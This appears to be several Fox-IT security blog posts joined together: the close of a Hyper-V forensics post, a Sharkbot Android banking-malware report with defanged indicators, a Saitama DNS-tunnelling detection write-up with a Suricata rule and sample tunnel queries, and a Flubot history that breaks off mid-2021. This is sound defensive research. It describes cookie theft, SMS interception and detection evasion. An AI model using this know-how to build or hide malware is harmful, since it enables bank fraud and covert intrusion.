Now that we’ve achieved our goal on ESXi, let’s take a quick look to see what we need to do to achieve the same on Hyper-V. I mentioned earlier that Hyper-V was the easy one, and it really was. Hyper-V is just an extension of Windows, and we already know how to deal with Windows in Dissect and Acquire. We only need to figure out how to get and interpret information about virtual machines and we’re off to the races.

Hyper-V uses VHD or VHDX as its virtual disks. We already support that in Dissect, so nothing to do there. We need some metadata on where these virtual disks are located, as well as which virtual disks belong to a virtual machine. This is important, because we want a complete picture of a system for data acquisition. Not only to collect all filesystem artefacts (e.g. MFT or UsnJrnl of all filesystems), but also because important artefacts, like the Windows event logs, may be configured to store data on a different filesystem. We also want to know where to find all the registered virtual machines, so that no manual steps are required to run Acquire on all of them.

A little bit of research shows that information about virtual machines was historically stored in XML files, but any recent version of Hyper-V uses VMCX files, a proprietary file format. Never easy! For comparison, VMware stores this virtual machine metadata in a plaintext VMX file. Information about which virtual machines are present is stored in another VMCX file, located at C:\ProgramData\Microsoft\Windows\Hyper-V\data.vmcx. Before we’re able to progress, we must parse these VMCX files.

Nothing our trusty IDA Pro can’t solve! A few hours later we have a fully featured parser and can easily extract the necessary information out of these VMCX files. Just add a few lines of code in Dissect to interpret this information and we have fully automated virtual machine acquisition capabilities for Hyper-V!

Conclusion

The end result of all this work is that we can add a new capability to our Dissect toolbelt: hypervisor data acquisition. As a bonus, we can now also easily perform investigations on hypervisor systems with the same toolset!

There are of course some limitations to these methods, most of which are related to how the storage is configured. At the time of writing, our approach only works on local or iSCSI-based storage. Usage of vSAN or NFS are currently unsupported. Thankfully most of our clients use these supported methods, and research into improvements obviously never stops.

We initially mentioned scale and ease of deployment as a primary motivator, but other important factors are stealth and preservation of evidence. These seem to be often overlooked by recent trends in DFIR, but they’re still very important factors for us at Fox-IT. Especially when dealing with advanced threat actors, you want to be as stealthy as possible. Assuming your hypervisor isn’t compromised (😉), it doesn’t get much stealthier than performing data acquisition from the virtualization layer, while still maintaining some sense of scalability. This also achieves the ultimate preservation of evidence. Any new file you introduce or piece of software you execute contaminates your evidence, while also risking rollovers of evidence.

The last takeaway we want to mention is just how relatively easy all of this was. Sure, there was a lot of reverse engineering and writing filesystem implementations, but those are auxiliary tasks that you would have to perform regardless of the end goal. The important detail is that we only had to add a few lines of code to Dissect to have it all just… work. The immense flexibility of Dissect allows us to easily add “complex” capabilities like these with ease. All our analysts can continue to use the same tools they’re already used to, and we can employ all our existing analysis capabilities on these new platforms.

In the time between when this blog was written and published, Mandiant released excellent blog posts[1][2] about malware targeting VMware ESXi, highlighting the importance of hypervisor forensics and incident response. We will also dive deeper into this topic with future blog posts.

[1] https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence
[2] https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening

Sharkbot is back in Google Play

Authored by Alberto Segura (main author) and Mike Stokkel (co-author)

Introduction

After we discovered in February 2022 the SharkBotDropper in Google Play posing as a fake Android antivirus and cleaner, now we have detected a new version of this dropper active in the Google Play and dropping a new version of Sharkbot.
This new dropper doesn’t rely Accessibility permissions to automatically perform the installation of the dropper Sharkbot malware. Instead, this new version ask the victim to install the malware as a fake update for the antivirus to stay protected against threats.
We have found two SharkbotDopper apps active in Google Play Store, with 10K and 50K installs each of them.

The Google Play droppers are downloading the full featured Sharkbot V2, discovered some time ago by ThreatFabric. On the 16th of August 2022, Fox-IT’s Threat Intelligence team observed new command-and-control servers (C2s), that were providing a list of targets including banks outside of United Kingdom and Italy. The new targeted countries in those C2s were: Spain, Australia, Poland, Germany, United States of America and Austria.

On the 22nd of August 2022, Fox-IT’s Threat Intelligence team found a new Sharkbot sample with version 2.25; communicating with command-and-control servers mentioned previously. This Sharkbot version introduced a new feature to steal session cookies from the victims that logs into their bank account.

The new SharkbotDropper in Google Play

In the previous versions of SharkbotDropper, the dropper was abusing accessibility permissions in order to install automatically the dropper malware. To do this, the dropper made a request to its command-and-control server, which provided an URL to download the full featured Sharkbot malware and a list of steps to automatically install the malware, as we can see in the following image.

Abusing the accessibility permissions, the dropper was able to automatically click all the buttons shown in the UI to install Sharkbot. But this not the case in this new version of the dropper for Sharkbot. The dropper instead will make a request to the C2 server to directly receive the APK file of Sharkbot. It won’t receive a download link alongside the steps to install the malware using the ‘Automatic Transfer Systems’ (ATS) features, which it normally did.

In order to make this request, the dropper uses the following code, in which it prepares the POST request body with a JSON object containing information about the infection. The body of the request is encrypted using RC4 and a hard coded key.

In order to complete the installation on the infected device, the dropper will ask the user to install this APK as an update for the fake antivirus. Which results in the malware starting an Android Intent to install the fake update.

This way, the new version of the Sharkbot dropper is now installing the payload in a non automatic way, which makes it more difficult to get installed – since it depends on the user interaction to be installed -, but it is now more difficult to detect before being published in Google Play Store, since it doesn’t need the accessibility permissions which are always suspicious.
Besides this, the dropper has also removed the ‘Direct Reply’ feature, used to automatically reply to the received notifications on the infected device. This is another feature which needs suspicious permissions, and which once removed makes it more difficult to detect.

To make detection of the dropper by Google’s review team even harder, the malware contains a basic configuration hard coded and encrypted using RC4, as we can see in the following image.

The decrypted configuration, as we can see in the following image, contains the list of targeted applications, the C2 domain and the countries targeted by the campaign (in this example UK and Italy).

If we look carefully at the code used to check the installed apps against the targeted apps, we can realize that it first makes another check in the first lines:

String lowerCase = ((TelephonyManager) App.f7282a.getSystemService("phone")).getSimCountryIso().toLowerCase();
    if (!lowerCase.isEmpty() && this.f.getString(0).contains(lowerCase)) 

Besides having at least one of the targeted apps installed in the device, the SharkbotDropper is checking if the SIM provider’s country code is one of the ones included in the configuration – in this campaign it must be GB or IT. If it matches and the device has installed any of the targeted apps, then the dropper can request the full malware download from the C2 server. This way, it is much more difficult to check if the app is dropping something malicious. But this is not the only way to make sure only targeted users are infected, the app published in Google Play is only available to install in United Kingdom and Italy.

After the dropper installs the actual Sharkbot v2 malware, it’s time for the malware to ask for accessibility permissions to start stealing victim’s information.

Sharkbot 2.25-2.26: New features to steal cookies

The Sharkbot malware keeps the usual information stealing features we introduced in our first post about Sharkbot:

  • Injections (overlay attacks): this feature allows Sharkbot to steal credentials by showing a fake website (phishing) inside a WebView. It is shown as soon as the malware detects one of the banking application has been opened.
  • Keylogging: this feature allows Sharkbot to receive every accessibility event produced in the infected device, this way, it can log events such as button clicks, changes in TextFields, etc, and finally send them to the C2.
  • SMS intercept: this feature allows Sharkbot to receive every text message received in the device, and send it to the C2.
  • Remote control/ATS: this feature allows Sharkbot to simulate accessibility events such as button clicks, physical button presses, TextField changes, etc. It is used to automatically make financial transactions using the victim’s device, this way the threat actors don’t need to log in to the stolen bank account, bypassing a lot of the security measures.

Those features were present in Sharkbot 1, but also in Sharkbot 2, which didn’t change too much related to the implemented features to steal information. As ThreatFabric pointed out in their tweet, Sharkbot 2, which was detected in May 2022, is a code refactor of the malware and introduces a few changes related to the C2 Domain Generation Algorithm (DGA) and the protocol used to communicate with the server.
Version 2 introduced a new DGA, with new TLDs and new code, since it now uses MD5 to generate the domain name instead of Base64.

We have not observed any big changes until version 2.25, in which the developers of Sharkbot have introduced a new and interesting feature: Cookie Stealing or Cookie logger. This new feature allows Sharkbot to receive an URL and an User-Agent value – using a new command ‘logsCookie’ -, these will be used to open a WebView loading this URL – using the received User-Agent as header – as we can see in the following images of the code.

Once the victim logged in to his bank account, the malware will receive the PageFinished event and will get the cookies of the website loaded inside the malicious WebView, to finally send them to the C2.

New campaigns in new countries

During our research, we observed that the newer C2 servers are providing new targeted applications in Sharkbot’s configuration. The list of targeted countries has grown including Spain, Australia, Poland, Germany, United States of America and Austria. But the interesting thing is the new targeted applications are not targeted using the typical webinjections, instead, they are targeted using the keylogging – grabber – features. This way, the malware is stealing information from the text showed inside the official app. As we can see in the following image, the focus seems to be getting the account balance and, in some cases, the password, by reading the content of specific TextFields.

Also, for some of the targeted applications, the malware is providing within the configuration a list of ATS configurations used to avoid the log in based on fingerprint, which should allow to show the usual username and password form. This allows the malware to steal the credentials using the previously mentioned ‘keylogging’ features, since log in via fingerprint should ask for credentials.

Conclusion

Since we published our first blog post about Sharkbot in March 2022, in which we detected the SharkbotDropper campaigns within Google Play Store, the developers have been working hard to improve their malware and the dropper. In May, ThreatFabric found a new version of Sharkbot, the version 2.0 of Sharkbot that was a refactor of the source code, included some changes in the communication protocol and in the DGA.

Until now, Sharkbot’s developers seem to have been focusing on the dropper in order to keep using Google Play Store to distribute their malware in the latest campaigns. These latest campaigns still use fake antivirus and Android cleaners to install the dropper from the Google Play.

With all these the changes and new features, we are expecting to see more campaigns, targeted applications, targeted countries and changes in Sharkbot this year.

Indicators of compromise

SharkbotDropper samples published in Google Play:

  • hxxps://play.google[.]com/store/apps/details?id=com.kylhavy.antivirus
  • hxxps://play.google[.]com/store/apps/details?id=com.mbkristine8.cleanmaster

Dropper Command-and-control (C2):

  • hxxp://mefika[.]me/

Sharkbot 2.25 (introducing new Cookie stealing features):

  • Hash: 7f2248f5de8a74b3d1c48be0db574b1c6558d6edae347592b29dc5234337a5ff
  • C2: hxxp://browntrawler[.]store/ (185.212.47[.]113)

Sharkbot v2.26 sample:

  • Hash: 870747141b1a2afcd76b4c6482ce0c3c21480ae3700d9cb9dd318aed0f963c58
  • C2: hxxp://browntrawler[.]store/ (185.212.47[.]113)

DGA Active C2s:

  • 23080420d0d93913[.]live (185.212.47[.]113)
  • 7f3e61be7bb7363d[.]live (185.212.47[.]113)

Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study 

Max Groot & Ruud van Luijk

TL;DR

A recently uncovered malware sample dubbed ‘Saitama’ was uncovered by security firm Malwarebytes in a weaponized document, possibly targeted towards the Jordan government. This Saitama implant uses DNS as its sole Command and Control channel and utilizes long sleep times and (sub)domain randomization to evade detection. As no server-side implementation was available for this implant, our detection engineers had very little to go on to verify whether their detection would trigger on such a communication channel. This blog documents the development of a Saitama server-side implementation, as well as several approaches taken by Fox-IT / NCC Group’s Research and Intelligence Fusion Team (RIFT) to be able to detect DNS-tunnelling implants such as Saitama. The developed implementation as well as recordings of the implant are shared on the Fox-IT GitHub.

Introduction

For its Managed Detection and Response (MDR) offering, Fox-IT is continuously building and testing detection coverage for the latest threats. Such detection efforts vary across all tactics, techniques, and procedures (TTP’s) of adversaries, an important one being Command and Control (C2). Detection of Command and Control involves catching attackers based on the communication between the implants on victim machines and the adversary infrastructure.  

In May 2022, security firm Malwarebytes published a two1-part2 blog about a malware sample that utilizes DNS as its sole channel for C2 communication. This sample, dubbed ‘Saitama’, sets up a C2 channel that tries to be stealthy using randomization and long sleep times. These features make the traffic difficult to detect even though the implant does not use DNS-over-HTTPS (DoH) to encrypt its DNS queries.  

Although DNS tunnelling remains a relatively rare technique for C2 communication, it should not be ignored completely. While focusing on Indicators of Compromise (IOC’s) can be useful for retroactive hunting, robust detection in real-time is preferable. To assess and tune existing coverage, a more detailed understanding of the inner workings of the implant is required. This blog will use the Saitama implant to illustrate how malicious DNS tunnels can be set-up in a variety of ways, and how this variety affects the detection engineering process.  

To assist defensive researchers, this blogpost comes with the publication of a server-side implementation of Saitama on the Fox-IT GitHub. This can be used to control the implant in a lab environment. Moreover, ‘on the wire’ recordings of the implant that were generated using said implementation are also shared as PCAP and Zeek logs. This blog also details multiple approaches towards detecting the implant’s traffic, using a Suricata signature and behavioural detection. 

Reconstructing the Saitama traffic 

The behaviour of the Saitama implant from the perspective of the victim machine has already been documented elsewhere3. However, to generate a full recording of the implant’s behaviour, a C2 server is necessary that properly controls and instructs the implant. Of course, the source code of the C2 server used by the actual developer of the implant is not available. 

If you aim to detect the malware in real-time, detection efforts should focus on the way traffic is generated by the implant, rather than the specific domains that the traffic is sent to. We strongly believe in the “PCAP or it didn’t happen” philosophy. Thus, instead of relying on assumptions while building detection, we built the server-side component of Saitama to be able to generate a PCAP. 

The server-side implementation of Saitama can be found on the Fox-IT GitHub page. Be aware that this implementation is a Proof-of-Concept. We do not intend on fully weaponizing the implant “for the greater good”, and have thus provided resources to the point where we believe detection engineers and blue teamers have everything they need to assess their defences against the techniques used by Saitama.

Let’s do the twist

The usage of DNS as the channel for C2 communication has a few upsides and quite some major downsides from an attacker’s perspective. While it is true that in many environments DNS is relatively unrestricted, the protocol itself is not designed to transfer large volumes of data. Moreover, the caching of DNS queries forces the implant to make sure that every DNS query sent is unique, to guarantee the DNS query reaches the C2 server.  

For this, the Saitama implant relies on continuously shuffling the character set used to construct DNS queries. While this shuffle makes it near-impossible for two consecutive DNS queries to be the same, it does require the server and client to be perfectly in sync for them to both shuffle their character sets in the same way.  

On startup, the Saitama implant generates a random number between 0 and 46655 and assigns this to a counter variable. Using a shared secret key (“haruto” for the variant discussed here) and a shared initial character set (“razupgnv2w01eos4t38h7yqidxmkljc6b9f5”), the client encodes this counter and sends it over DNS to the C2 server. This counter is then used as the seed for a Pseudo-Random Number Generator (PRNG). Saitama uses the Mersenne Twister to generate a pseudo-random number upon every ‘twist’. 

To encode this counter, the implant relies on a function named ‘_IntToString’. This function receives an integer and a ‘base string’, which for the first DNS query is the same initial, shared character set as identified in the previous paragraph. Until the input number is equal or lower than zero, the function uses the input number to choose a character from the base string and prepends that to the variable ‘str’ which will be returned as the function output. At the end of each loop iteration, the input number is divided by the length of the baseString parameter, thus bringing the value down. 

Function used by Saitama client to convert an integer into an encoded string

To determine the initial seed, the server has to ‘invert’ this function to convert the encoded string back into its original number. However, information gets lost during the client-side conversion because this conversion rounds down without any decimals. The server tries to invert this conversion by using simple multiplication. Therefore, the server might calculate a number that does not equal the seed sent by the client and thus must verify whether the inversion function calculated the correct seed. If this is not the case, the server literately tries higher numbers until the correct seed is found.   

Once this hurdle is taken, the rest of the server-side implementation is trivial. The client appends its current counter value to every DNS query sent to the server. This counter is used as the seed for the PRNG. This PRNG is used to shuffle the initial character set into a new one, which is then used to encode the data that the client sends to the server. Thus, when both server and client use the same seed (the counter variable) to generate random numbers for the shuffling of the character set, they both arrive at the exact same character set. This allows the server and implant to communicate in the same ‘language’. The server then simply substitutes the characters from the shuffled alphabet back into the ‘base’ alphabet to derive what data was sent by the client.  

Server-side implementation to arrive at the same shuffled alphabet as the client

Twist, Sleep, Send, Repeat

Many C2 frameworks allow attackers to manually set the minimum and maximum sleep times for their implants. While low sleep times allow attackers to more quickly execute commands and receive outputs, higher sleep times generate less noise in the victim network. Detection often relies on thresholds, where suspicious behaviour will only trigger an alert when it happens multiple times in a certain period.  

The Saitama implant uses hardcoded sleep values. During active communication (such as when it returns command output back to the server), the minimum sleep time is 40 seconds while the maximum sleep time is 80 seconds. On every DNS query sent, the client will pick a random value between 40 and 80 seconds. Moreover, the DNS query is not sent to the same domain every time but is distributed across three domains. On every request, one of these domains is randomly chosen. The implant has no functionality to alter these sleep times at runtime, nor does it possess an option to ‘skip’ the sleeping step altogether.  

Sleep configuration of the implant. The integers represent sleep times in milliseconds.

These sleep times and distribution of communication hinder detection efforts, as they allow the implant to further ‘blend in’ with legitimate network traffic. While the traffic itself appears anything but benign to the trained eye, the sleep times and distribution bury the ‘needle’ that is this implant’s traffic very deep in the haystack of the overall network traffic.  

For attackers, choosing values for the sleep time is a balancing act between keeping the implant stealthy while keeping it usable. Considering Saitama’s sleep times and keeping in mind that every individual DNS query only transmits 15 bytes of output data, the usability of the implant is quite low. Although the implant can compress its output using zlib deflation, communication between server and client still takes a lot of time. For example, the standard output of the ‘whoami /priv’ command, which once zlib deflated is 663 bytes, takes more than an hour to transmit from victim machine to a C2 server.  


Transmission between server implementation and the implant

Transmission between server implementation and the implant 

The implant does contain a set of hardcoded commands that can be triggered using only one command code, rather than sending the command in its entirety from the server to the client. However, there is no way of knowing whether these hardcoded commands are even used by attackers or are left in the implant as a means of misdirection to hinder attribution. Moreover, the output from these hardcoded commands still has to be sent back to the C2 server, with the same delays as any other sent command. 

Detection

Detecting DNS tunnelling has been the subject of research for a long time, as this technique can be implemented in a multitude of different ways. In addition, the complications of the communication channel force attackers to make more noise, as they must send a lot of data over a channel that is not designed for that purpose. While ‘idle’ implants can be hard to detect due to little communication occurring over the wire, any DNS implant will have to make more noise once it starts receiving commands and sending command outputs. These communication ‘bursts’ is where DNS tunnelling can most reliably be detected. In this section we give examples of how to detect Saitama and a few well-known tools used by actual adversaries.  

Signature-based 

Where possible we aim to write signature-based detection, as this provides a solid base and quick tool attribution. The randomization used by the Saitama implant as outlined previously makes signature-based detection challenging in this case, but not impossible. When actively communicating command output, the Saitama implant generates a high number of randomized DNS queries. This randomization does follow a specific pattern that we believe can be generalized in the following Suricata rule: 

alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT - Trojan - Possible Saitama Exfil Pattern Observed"; flow:stateless; content:"|00 01 00 00 00 00 00 00|"; byte_test:1,>=,0x1c,0,relative; fast_pattern; byte_test:1,<=,0x1f,0,relative; dns_query; content:"."; content:"."; distance:1; content:!"."; distance:1; pcre:"/^(?=[0-9]+[a-z]\|[a-z]+[0-9])[a-z0-9]{28,31}\.[^.]+\.[a-z]+$/"; threshold:type both, track by_src, count 50, seconds 3600; classtype:trojan-activity; priority:2; reference:url, https://github.com/fox-it/saitama-server; metadata:ids suricata; sid:21004170; rev:1;)

This signature may seem a bit complex, but if we dissect this into separate parts it is intuitive given the previous parts. 

Content Match Explanation 
00 01 00 00 00 00 00 00 DNS query header. This match is mostly used to place the pointer at the correct position for the byte_test content matches. 
byte_test:1,>=,0x1c,0,relative; Next byte should be at least decimal 25. This byte signifies the length of the coming subdomain 
byte_test:1,<=,0x1f,0,relative; The same byte as the previous one should be at most 31. 
dns_query; content:”.”; content:”.”; distance:1; content:!”.”; DNS query should contain precisely two ‘.’ characters 
pcre:”/^(?=[0-9][a-z]|[a-z][0-9])[a-z0-9] {28,31} 
\.[^.]\.[a-z]$/”; 
Subdomain in DNS query should contain at least one number and one letter, and no other types of characters.
threshold:type both, track by_src, count 50, seconds 3600 Only trigger if there are more than 50 queries in the last 3600 seconds. And only trigger once per 3600 seconds. 
Table one: Content matches for Suricata IDS rule

 
The choice for 28-31 characters is based on the structure of DNS queries containing output. First, one byte is dedicated to the ‘send and receive’ command code. Then follows the encoded ID of the implant, which can take between 1 and 3 bytes. Then, 2 bytes are dedicated to the byte index of the output data. Followed by 20 bytes of base-32 encoded output. Lastly the current value for the ‘counter’ variable will be sent. As this number can range between 0 and 46656, this takes between 1 and 5 bytes. 

Behaviour-based 

The randomization that makes it difficult to create signatures is also to the defender’s advantage: most benign DNS queries are far from random. As seen in the table below, each hack tool outlined has at least one subdomain that has an encrypted or encoded part. While initially one might opt for measuring entropy to approximate randomness, said technique is less reliable when the input string is short. The usage of N-grams, an approach we have previously written about4, is better suited.  

Hacktool Example 
DNScat2 35bc006955018b0021636f6d6d616e642073657373696f6e00.domain.tld5 
Weasel pj7gatv3j2iz-dvyverpewpnnu–ykuct3gtbqoop2smr3mkxqt4.ab.abdc.domain.tld 
Anchor ueajx6snh6xick6iagmhvmbndj.domain.tld6 
Cobalt Strike Api.abcdefgh0.123456.dns.example.com or   post. 4c6f72656d20697073756d20646f6c6f722073697420616d65742073756e74207175697320756c6c616d636f20616420646f6c6f7220616c69717569702073756e7420636f6d6d6f646f20656975736d6f642070726.c123456.dns.example.com 
Sliver 3eHUMj4LUA4HacKK2yuXew6ko1n45LnxZoeZDeJacUMT8ybuFciQ63AxVtjbmHD.fAh5MYs44zH8pWTugjdEQfrKNPeiN9SSXm7pFT5qvY43eJ9T4NyxFFPyuyMRDpx.GhAwhzJCgVsTn6w5C4aH8BeRjTrrvhq.domain.tld 
Saitama 6wcrrrry9i8t5b8fyfjrrlz9iw9arpcl.domain.tld 
Table two: Example DNS queries for various toolings that support DNS tunnelling

Unfortunately, the detection of randomness in DNS queries is by itself not a solid enough indicator to detect DNS tunnels without yielding large numbers of false positives. However, a second limitation of DNS tunnelling is that a DNS query can only carry a limited number of bytes. To be an effective C2 channel an attacker needs to be able to send multiple commands and receive corresponding output, resulting in (slow) bursts of multiple queries.  

This is where the second step for behaviour-based detection comes in: plainly counting the number of unique queries that have been classified as ‘randomized’. The specifics of these bursts differ slightly between tools, but in general, there is no or little idle time between two queries. Saitama is an exception in this case. It uses a uniformly distributed sleep between 40 and 80 seconds between two queries, meaning that on average there is a one-minute delay. This expected sleep of 60 seconds is an intuitive start to determine the threshold. If we aggregate over an hour, we expect 60 queries distributed over 3 domains. However, this is the mean value and in 50% of the cases there are less than 60 queries in an hour.  

To be sure we detect this, regardless of random sleeps, we can use the fact that the sum of uniform random observations approximates a normal distribution. With this distribution we can calculate the number of queries that result in an acceptable probability. Looking at the distribution, that would be 53. We use 50 in our signature and other rules to incorporate possible packet loss and other unexpected factors. Note that this number varies between tools and is therefore not a set-in-stone threshold. Different thresholds for different tools may be used to balance False Positives and False Negatives. 

In summary, combining detection for random-appearing DNS queries with a minimum threshold of random-like DNS queries per hour, can be a useful approach for the detection of DNS tunnelling. We found in our testing that there can still be some false positives, for example caused by antivirus solutions. Therefore, a last step is creating a small allow list for domains that have been verified to be benign. 

While more sophisticated detection methods may be available, we believe this method is still powerful (at least powerful enough to catch this malware) and more importantly, easy to use on different platforms such as Network Sensors or SIEMs and on diverse types of logs. 

Conclusion

When new malware arises, it is paramount to verify existing detection efforts to ensure they properly trigger on the newly encountered threat. While Indicators of Compromise can be used to retroactively hunt for possible infections, we prefer the detection of threats in (near-)real-time. This blog has outlined how we developed a server-side implementation of the implant to create a proper recording of the implant’s behaviour. This can subsequently be used for detection engineering purposes. 

Strong randomization, such as observed in the Saitama implant, significantly hinders signature-based detection. We detect the threat by detecting its evasive method, in this case randomization. Legitimate DNS traffic rarely consists of random-appearing subdomains, and to see this occurring in large bursts to previously unseen domains is even more unlikely to be benign.  

Resources

With the sharing of the server-side implementation and recordings of Saitama traffic, we hope that others can test their defensive solutions.  

The server-side implementation of Saitama can be found on the Fox-IT GitHub.  

This repository also contains an example PCAP & Zeek logs of traffic generated by the Saitama implant. The repository also features a replay script that can be used to parse executed commands & command output out of a PCAP. 

References

[1] https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/ 
[2] https://blog.malwarebytes.com/threat-intelligence/2022/05/how-the-saitama-backdoor-uses-dns-tunnelling/ 
[3] https://x-junior.github.io/malware%20analysis/2022/06/24/Apt34.html
[4] https://blog.fox-it.com/2019/06/11/using-anomaly-detection-to-find-malicious-domains/   

Flubot: the evolution of a notorious Android Banking Malware

Authored by Alberto Segura (main author) and Rolf Govers (co-author)

Summary

Flubot is an Android based malware that has been distributed in the past 1.5 years in
Europe, Asia and Oceania affecting thousands of devices of mostly unsuspecting victims.
Like the majority of Android banking malware, Flubot abuses Accessibility Permissions and Services
in order to steal the victim’s credentials, by detecting when the official banking application
is open to show a fake web injection, a phishing website similar to the login form of the banking
application. An important part of the popularity of Flubot is due to the distribution
strategy used in its campaigns, since it has been using the infected devices to send
text messages, luring new victims into installing the malware from a fake website.
In this article we detail its development over time and recent developments regarding
its disappearance, including new features and distribution campaigns.

Introduction

One of the most popular active Android banking malware families today. An “inspiration” for developers of other Android banking malware families. Of course we are talking about Flubot. Never heard of it? Let us give you a quick summary.

Flubot banking malware families are in the wild since at least the period between late 2020 and the first quarter of 2022. Most of its popularity comes from its distribution method: smishing. Threat Actors (TA) have been using the infected devices to send text messages to other phone numbers, stolen from other infected devices and stored in Command-and-Control servers (C2).

In the initial campaigns, TAs used fake Fedex, DHL and Correos – a local Spanish parcel shipping company – SMS messages. Those SMS messages were fake notifications which lured the user into a fake website in order to download a mobile application to track the shipping. These campaigns were very successful, since nowadays most people are used to buy different kinds of products online and receive that type of messages to track the shipping of the product.
Flubot is not only a very active family: TAs have been very actively introducing new features, support for campaigns in new countries and improving the features it already had.

On June 1, 2022, Europol announced the takedown of Flubot in a joint operation including 11 countries. The Dutch Police played a key part in this operation and successfully disrupted the infrastructure in May 2022, rendering this strain of malware inactive. That was interesting period of time to look back at the early days of Flubot, how it evolved and became so notorious.

In this post we want to share all we know about this threat and a timeline of the most relevant and interesting (new) features and changes that Flubot’s TAs have introduced. We will focus on these features and changes related to the detected samples but also in the different campaigns that TAs have been using to distribute this malware.

The beginning: A new Android Banking Malware targeting Spain [Flubot versions 0.1-3.3]


Based on reports from other researchers, Flubot samples were first found in the wild between November and December of 2020. Public information about this malware was first published on 6 January 2021 by our partner ThreatFabric (https://twitter.com/ThreatFabric/status/1346807891152560131). Even though ThreatFabric was the first to publish public information on this new family and called it “Cabassous”, the research community has been more commonly referring to this malware as Flubot.

In the initial campaigns, Flubot was distributed using Fedex and Correos fake SMS messages. In those messages, the user was led to a fake website which was basically a “landing page” style website to download what was supposed to be an Android application to track the incoming shipping.

In this initial campaign versions prior to Flubot 3.4 were used, and TAs were including support for new campaigns in other countries using specific samples for each country. The reasons why there were different samples for different countries were:
– Domain Generation Algorithm (DGA). It was using a different seed to generate 5.000 different domains per month. Just out of curiosity: For Germany, TAs were using 1945 as seed for the DGA.
– Phone country code used to send more distribution smishing SMS messages from infected devices and block those numbers in order to avoid communication among victims.

There were no significant changes related to features in the initial versions (from 0.1 to 3.3). TAs were mostly focused on the distribution campaigns, trying to infect as many devices as possible.

There is one important change in the initial versions, but it is difficult to find the exact version in which this change was first introduced because there are some version without samples on public repositories. TAs introduced web injections to steal credentials, the most popular tactic to steal credentials on Android devices. This was introduced starting between versions 0.1 and 0.5, in December 2020.

In those initial versions, TAs increased the version number of the malware in just a few days without adding significant changes. Most of the samples – particularly previous to 2.1 – were not uploaded to public malware repositories, making it even harder to track the first versions of Flubot.

On these initial versions (after 0.5), TAs also introduced other not so popular features like the “USSD” one which was used to call to special numbers to earn money (“RUN_USSD” command), it was introduced at some point between versions 1.2 and 1.7. In fact, it seems this feature wasn’t really used by Flubot’s TAs. Most used features were the web injections to steal banking and cryptocurrency platform credentials and sending SMS features to distribute and infect new devices.

From version 2.1 to 2.8 we observed TAs started to use a different packer for the actual Flubot’s payload. It could explain why we weren’t able to find samples on public repositories between 2.1 and 2.8, probably there were some “internal” versions
used to try different packers and/or make it work with the new one.

March 2021: New countries and improvements on distribution campaigns [Flubot versions 3.4-3.7]


After a few months apparently focused on distribution campaigns and not really on new features for the malware itself, we have found version 3.4 in which TAs introduced some changes on the DGA code. In this version, they reduced the number of generated domains from 5.000 to 2.500 a month. At first sight this looks like a minor change, but is one of the first changes to start distributing the malware in different countries in a more easy way for TAs, since a different sample with different parameters was used for each country.

In fact, we can see a new version (3.6) customized for targeting victims in Germany in March 18, 2021. Only five days later, another version was released (3.7), with interesting changes. TAs were trying to use the same sample for campaigns in Spain and Germany, including Spanish and German phone country codes split by newline character to block
the phone number to which the infected device is sending smishing messages.

At the same time, TAs introduced a new campaign on Hungary. By the end of March, TAs introduced a new change on version 3.7: an important change in their DGA, since they replaced “.com” TLD with “.su”. This change was important for tracking Flubot, since now TAs could use this new TLD to register new C2’s domains.

April 2021: DoH and unique samples for all campaigns [Flubot versions 3.9-4.0]


It seems TAs were working since late March on a new version: Flubot 3.9. In this new version, they introduced DNS-over-HTTPs (DoH). This new feature was used to resolve domain names generated by the DGA. This way, it was more difficult to detect infected devices in the network, since security solutions were not able to check
which domains were being resolved.

In the following images we show decompiled code of this new version, including the new DoH code. TAs kept the old classic DNS resolving code. TAs introduced code to randomly choose if DoH or classic DNS should be used.

The introduction of DoH was not the only feature that was added to Flubot 3.9. TAs also added some UI messages to prepare future campaigns targeting Italy.
Those messages were used a few days later in the new Flubot 4.0 version, in which TAs finally started to use one single sample for all of the campaigns – no more unique samples to targeted different countries.

With this new version, the targeted country’s parameters used on previous version of Flubot were chosen depending on the victim’s device language. This way, if the device language was Spanish, then Spanish parameters were used. The following parameters were chosen:
– DGA seed
– Phone country codes used for smishing and phone number blocking

May 2021: Time for infrastructure and C2 server improvements [Flubot versions 4.1-4.3]


May starts with a minor update on version 4.0 – a change the DoH servers used to resolve DGA domains. Now instead of using CloudFlare’s servers they started using Google’s servers. This was the first step to move to a new version, Flubot 4.1.
In this new version, TAs have changed one more time the DoH servers used to resolve the C2 domains. In this case, they introduced three different services or DNS servers: Google, CloudFlare and AliDNS. The last one was used for the first time in the life of Flubot to resolve the DGA domains.

Those three different DoH services or servers were chosen randomly to resolve the generated domains, to finally make the requests to any of the active C2 servers.
These changes also brought a new campaign in Belgium, in which TAs used fake BPost app and smishing messages to lure new victims. One week later, new campaigns in Turkey were also introduced, this time in a new Flubot version with important changes related to its C2 protocol.

The first samples of Flubot 4.2 appeared on 17 May 2021 with a few important changes in the code used to communicate with the C2 servers. In this version, the malware was sending HTTP requests with a new path in the C2: “p.php”, instead of the classic “poll.php” path.

At first sight it seemed like a minor change, but paying attention to the code we realized there was an important reason behind this change: TAs changed the encryption method used for the protocol to communicate with the C2 servers.
Previous versions of Flubot were using simple XOR encryption to encrypt the information exchanged with the C2 servers, but this new version 4.2 was using
RC4 encryption to encrypt that information instead of the classic XOR. This way, the C2 server still supported old versions and new version at the same time:

  • poll.php and poll2.php were used to send/receive requests using the old XOR encryption
  • p.php was used to send and receive requests using the new RC4 encryption

Besides the new protocol encryption on version 4.2, TAs also added at the end of May support for new campaigns in Romania.
Finally, on 28 May 2021 new samples of Flubot 4.3 were discovered with minor changes, mainly focused on the strings obfuscation implemented by the malware.

June 2021: VoiceMail. New campaign new countries [Flubot versions 4.4-4.6]


A few days after first samples of Flubot 4.3 were discovered – on May 31, 2021 and June 1, 2021 – new samples of Flubot were observed with version number bumped to 4.4.
One more time, no major changes in this new version. TAs added support for campaigns in Portugal. As we can see with versions 4.3 and 4.4, it was common for Flubot’s TAs to bump the version number in just a few days, with just minor changes. Some versions were not even found in public repositories (e.g. version 3.3), which suggests that some versions were never used in public or just skipped and TAs just bumped the version. Maybe those “lost versions” lasted just a few hours in the distribution servers and were quickly updated to fix bugs.

